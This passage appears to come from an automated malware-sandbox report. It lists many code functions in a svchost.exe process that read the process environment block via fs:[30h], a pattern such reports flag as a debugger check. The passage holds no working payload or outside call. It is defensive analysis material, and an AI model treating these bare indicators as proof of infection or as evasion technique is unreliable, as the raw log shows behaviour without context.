                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov ecx, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA352 mov eax, dword ptr fs:[00000030h]1_2_02EFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED8350 mov ecx, dword ptr fs:[00000030h]1_2_02ED8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F0634F mov eax, dword ptr fs:[00000030h]1_2_02F0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F08324 mov eax, dword ptr fs:[00000030h]1_2_02F08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F08324 mov ecx, dword ptr fs:[00000030h]1_2_02F08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F08324 mov eax, dword ptr fs:[00000030h]1_2_02F08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F08324 mov eax, dword ptr fs:[00000030h]1_2_02F08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A30B mov eax, dword ptr fs:[00000030h]1_2_02E6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A30B mov eax, dword ptr fs:[00000030h]1_2_02E6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A30B mov eax, dword ptr fs:[00000030h]1_2_02E6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C310 mov ecx, dword ptr fs:[00000030h]1_2_02E2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E50310 mov ecx, dword ptr fs:[00000030h]1_2_02E50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02E2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E380E9 mov eax, dword ptr fs:[00000030h]1_2_02E380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB60E0 mov eax, dword ptr fs:[00000030h]1_2_02EB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02E2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E720F0 mov ecx, dword ptr fs:[00000030h]1_2_02E720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB20DE mov eax, dword ptr fs:[00000030h]1_2_02EB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E280A0 mov eax, dword ptr fs:[00000030h]1_2_02E280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC80A8 mov eax, dword ptr fs:[00000030h]1_2_02EC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF60B8 mov eax, dword ptr fs:[00000030h]1_2_02EF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02EF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3208A mov eax, dword ptr fs:[00000030h]1_2_02E3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5C073 mov eax, dword ptr fs:[00000030h]1_2_02E5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E32050 mov eax, dword ptr fs:[00000030h]1_2_02E32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6050 mov eax, dword ptr fs:[00000030h]1_2_02EB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A020 mov eax, dword ptr fs:[00000030h]1_2_02E2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C020 mov eax, dword ptr fs:[00000030h]1_2_02E2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6030 mov eax, dword ptr fs:[00000030h]1_2_02EC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB4000 mov ecx, dword ptr fs:[00000030h]1_2_02EB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED2000 mov eax, dword ptr fs:[00000030h]1_2_02ED2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E016 mov eax, dword ptr fs:[00000030h]1_2_02E4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F061E5 mov eax, dword ptr fs:[00000030h]1_2_02F061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E601F8 mov eax, dword ptr fs:[00000030h]1_2_02E601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF61C3 mov eax, dword ptr fs:[00000030h]1_2_02EF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF61C3 mov eax, dword ptr fs:[00000030h]1_2_02EF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02EAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02EAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E70185 mov eax, dword ptr fs:[00000030h]1_2_02E70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEC188 mov eax, dword ptr fs:[00000030h]1_2_02EEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEC188 mov eax, dword ptr fs:[00000030h]1_2_02EEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED4180 mov eax, dword ptr fs:[00000030h]1_2_02ED4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED4180 mov eax, dword ptr fs:[00000030h]1_2_02ED4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB019F mov eax, dword ptr fs:[00000030h]1_2_02EB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A197 mov eax, dword ptr fs:[00000030h]1_2_02E2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A197 mov eax, dword ptr fs:[00000030h]1_2_02E2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2A197 mov eax, dword ptr fs:[00000030h]1_2_02E2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04164 mov eax, dword ptr fs:[00000030h]1_2_02F04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04164 mov eax, dword ptr fs:[00000030h]1_2_02F04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov ecx, dword ptr fs:[00000030h]1_2_02EC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC4144 mov eax, dword ptr fs:[00000030h]1_2_02EC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C156 mov eax, dword ptr fs:[00000030h]1_2_02E2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC8158 mov eax, dword ptr fs:[00000030h]1_2_02EC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36154 mov eax, dword ptr fs:[00000030h]1_2_02E36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36154 mov eax, dword ptr fs:[00000030h]1_2_02E36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E60124 mov eax, dword ptr fs:[00000030h]1_2_02E60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov eax, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDE10E mov ecx, dword ptr fs:[00000030h]1_2_02EDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov ecx, dword ptr fs:[00000030h]1_2_02EDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov eax, dword ptr fs:[00000030h]1_2_02EDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov eax, dword ptr fs:[00000030h]1_2_02EDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDA118 mov eax, dword ptr fs:[00000030h]1_2_02EDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF0115 mov eax, dword ptr fs:[00000030h]1_2_02EF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02EAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB06F1 mov eax, dword ptr fs:[00000030h]1_2_02EB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB06F1 mov eax, dword ptr fs:[00000030h]1_2_02EB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02E6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02E6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02E6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E666B0 mov eax, dword ptr fs:[00000030h]1_2_02E666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34690 mov eax, dword ptr fs:[00000030h]1_2_02E34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34690 mov eax, dword ptr fs:[00000030h]1_2_02E34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF866E mov eax, dword ptr fs:[00000030h]1_2_02EF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF866E mov eax, dword ptr fs:[00000030h]1_2_02EF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A660 mov eax, dword ptr fs:[00000030h]1_2_02E6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A660 mov eax, dword ptr fs:[00000030h]1_2_02E6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E62674 mov eax, dword ptr fs:[00000030h]1_2_02E62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4C640 mov eax, dword ptr fs:[00000030h]1_2_02E4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4E627 mov eax, dword ptr fs:[00000030h]1_2_02E4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E66620 mov eax, dword ptr fs:[00000030h]1_2_02E66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68620 mov eax, dword ptr fs:[00000030h]1_2_02E68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3262C mov eax, dword ptr fs:[00000030h]1_2_02E3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE609 mov eax, dword ptr fs:[00000030h]1_2_02EAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E4260B mov eax, dword ptr fs:[00000030h]1_2_02E4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72619 mov eax, dword ptr fs:[00000030h]1_2_02E72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E527ED mov eax, dword ptr fs:[00000030h]1_2_02E527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E527ED mov eax, dword ptr fs:[00000030h]1_2_02E527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E527ED mov eax, dword ptr fs:[00000030h]1_2_02E527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02EBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E347FB mov eax, dword ptr fs:[00000030h]1_2_02E347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E347FB mov eax, dword ptr fs:[00000030h]1_2_02E347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02E3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB07C3 mov eax, dword ptr fs:[00000030h]1_2_02EB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E307AF mov eax, dword ptr fs:[00000030h]1_2_02E307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE47A0 mov eax, dword ptr fs:[00000030h]1_2_02EE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED678E mov eax, dword ptr fs:[00000030h]1_2_02ED678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E38770 mov eax, dword ptr fs:[00000030h]1_2_02E38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40770 mov eax, dword ptr fs:[00000030h]1_2_02E40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6674D mov esi, dword ptr fs:[00000030h]1_2_02E6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6674D mov eax, dword ptr fs:[00000030h]1_2_02E6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6674D mov eax, dword ptr fs:[00000030h]1_2_02E6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30750 mov eax, dword ptr fs:[00000030h]1_2_02E30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE75D mov eax, dword ptr fs:[00000030h]1_2_02EBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72750 mov eax, dword ptr fs:[00000030h]1_2_02E72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E72750 mov eax, dword ptr fs:[00000030h]1_2_02E72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB4755 mov eax, dword ptr fs:[00000030h]1_2_02EB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C720 mov eax, dword ptr fs:[00000030h]1_2_02E6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C720 mov eax, dword ptr fs:[00000030h]1_2_02E6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6273C mov eax, dword ptr fs:[00000030h]1_2_02E6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6273C mov ecx, dword ptr fs:[00000030h]1_2_02E6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6273C mov eax, dword ptr fs:[00000030h]1_2_02E6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAC730 mov eax, dword ptr fs:[00000030h]1_2_02EAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C700 mov eax, dword ptr fs:[00000030h]1_2_02E6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30710 mov eax, dword ptr fs:[00000030h]1_2_02E30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E60710 mov eax, dword ptr fs:[00000030h]1_2_02E60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E304E5 mov ecx, dword ptr fs:[00000030h]1_2_02E304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E364AB mov eax, dword ptr fs:[00000030h]1_2_02E364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E644B0 mov ecx, dword ptr fs:[00000030h]1_2_02E644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBA4B0 mov eax, dword ptr fs:[00000030h]1_2_02EBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEA49A mov eax, dword ptr fs:[00000030h]1_2_02EEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBC460 mov ecx, dword ptr fs:[00000030h]1_2_02EBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5A470 mov eax, dword ptr fs:[00000030h]1_2_02E5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5A470 mov eax, dword ptr fs:[00000030h]1_2_02E5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5A470 mov eax, dword ptr fs:[00000030h]1_2_02E5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E443 mov eax, dword ptr fs:[00000030h]1_2_02E6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEA456 mov eax, dword ptr fs:[00000030h]1_2_02EEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2645D mov eax, dword ptr fs:[00000030h]1_2_02E2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5245A mov eax, dword ptr fs:[00000030h]1_2_02E5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E420 mov eax, dword ptr fs:[00000030h]1_2_02E2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E420 mov eax, dword ptr fs:[00000030h]1_2_02E2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2E420 mov eax, dword ptr fs:[00000030h]1_2_02E2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2C427 mov eax, dword ptr fs:[00000030h]1_2_02E2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB6420 mov eax, dword ptr fs:[00000030h]1_2_02EB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68402 mov eax, dword ptr fs:[00000030h]1_2_02E68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68402 mov eax, dword ptr fs:[00000030h]1_2_02E68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68402 mov eax, dword ptr fs:[00000030h]1_2_02E68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02E5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E325E0 mov eax, dword ptr fs:[00000030h]1_2_02E325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C5ED mov eax, dword ptr fs:[00000030h]1_2_02E6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C5ED mov eax, dword ptr fs:[00000030h]1_2_02E6C5ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6E5CF mov eax, dword ptr fs:[00000030h] | 1_2_02E6E5CF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6E5CF mov eax, dword ptr fs:[00000030h] | 1_2_02E6E5CF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E365D0 mov eax, dword ptr fs:[00000030h] | 1_2_02E365D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6A5D0 mov eax, dword ptr fs:[00000030h] | 1_2_02E6A5D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6A5D0 mov eax, dword ptr fs:[00000030h] | 1_2_02E6A5D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EB05A7 mov eax, dword ptr fs:[00000030h] | 1_2_02EB05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EB05A7 mov eax, dword ptr fs:[00000030h] | 1_2_02EB05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EB05A7 mov eax, dword ptr fs:[00000030h] | 1_2_02EB05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E545B1 mov eax, dword ptr fs:[00000030h] | 1_2_02E545B1
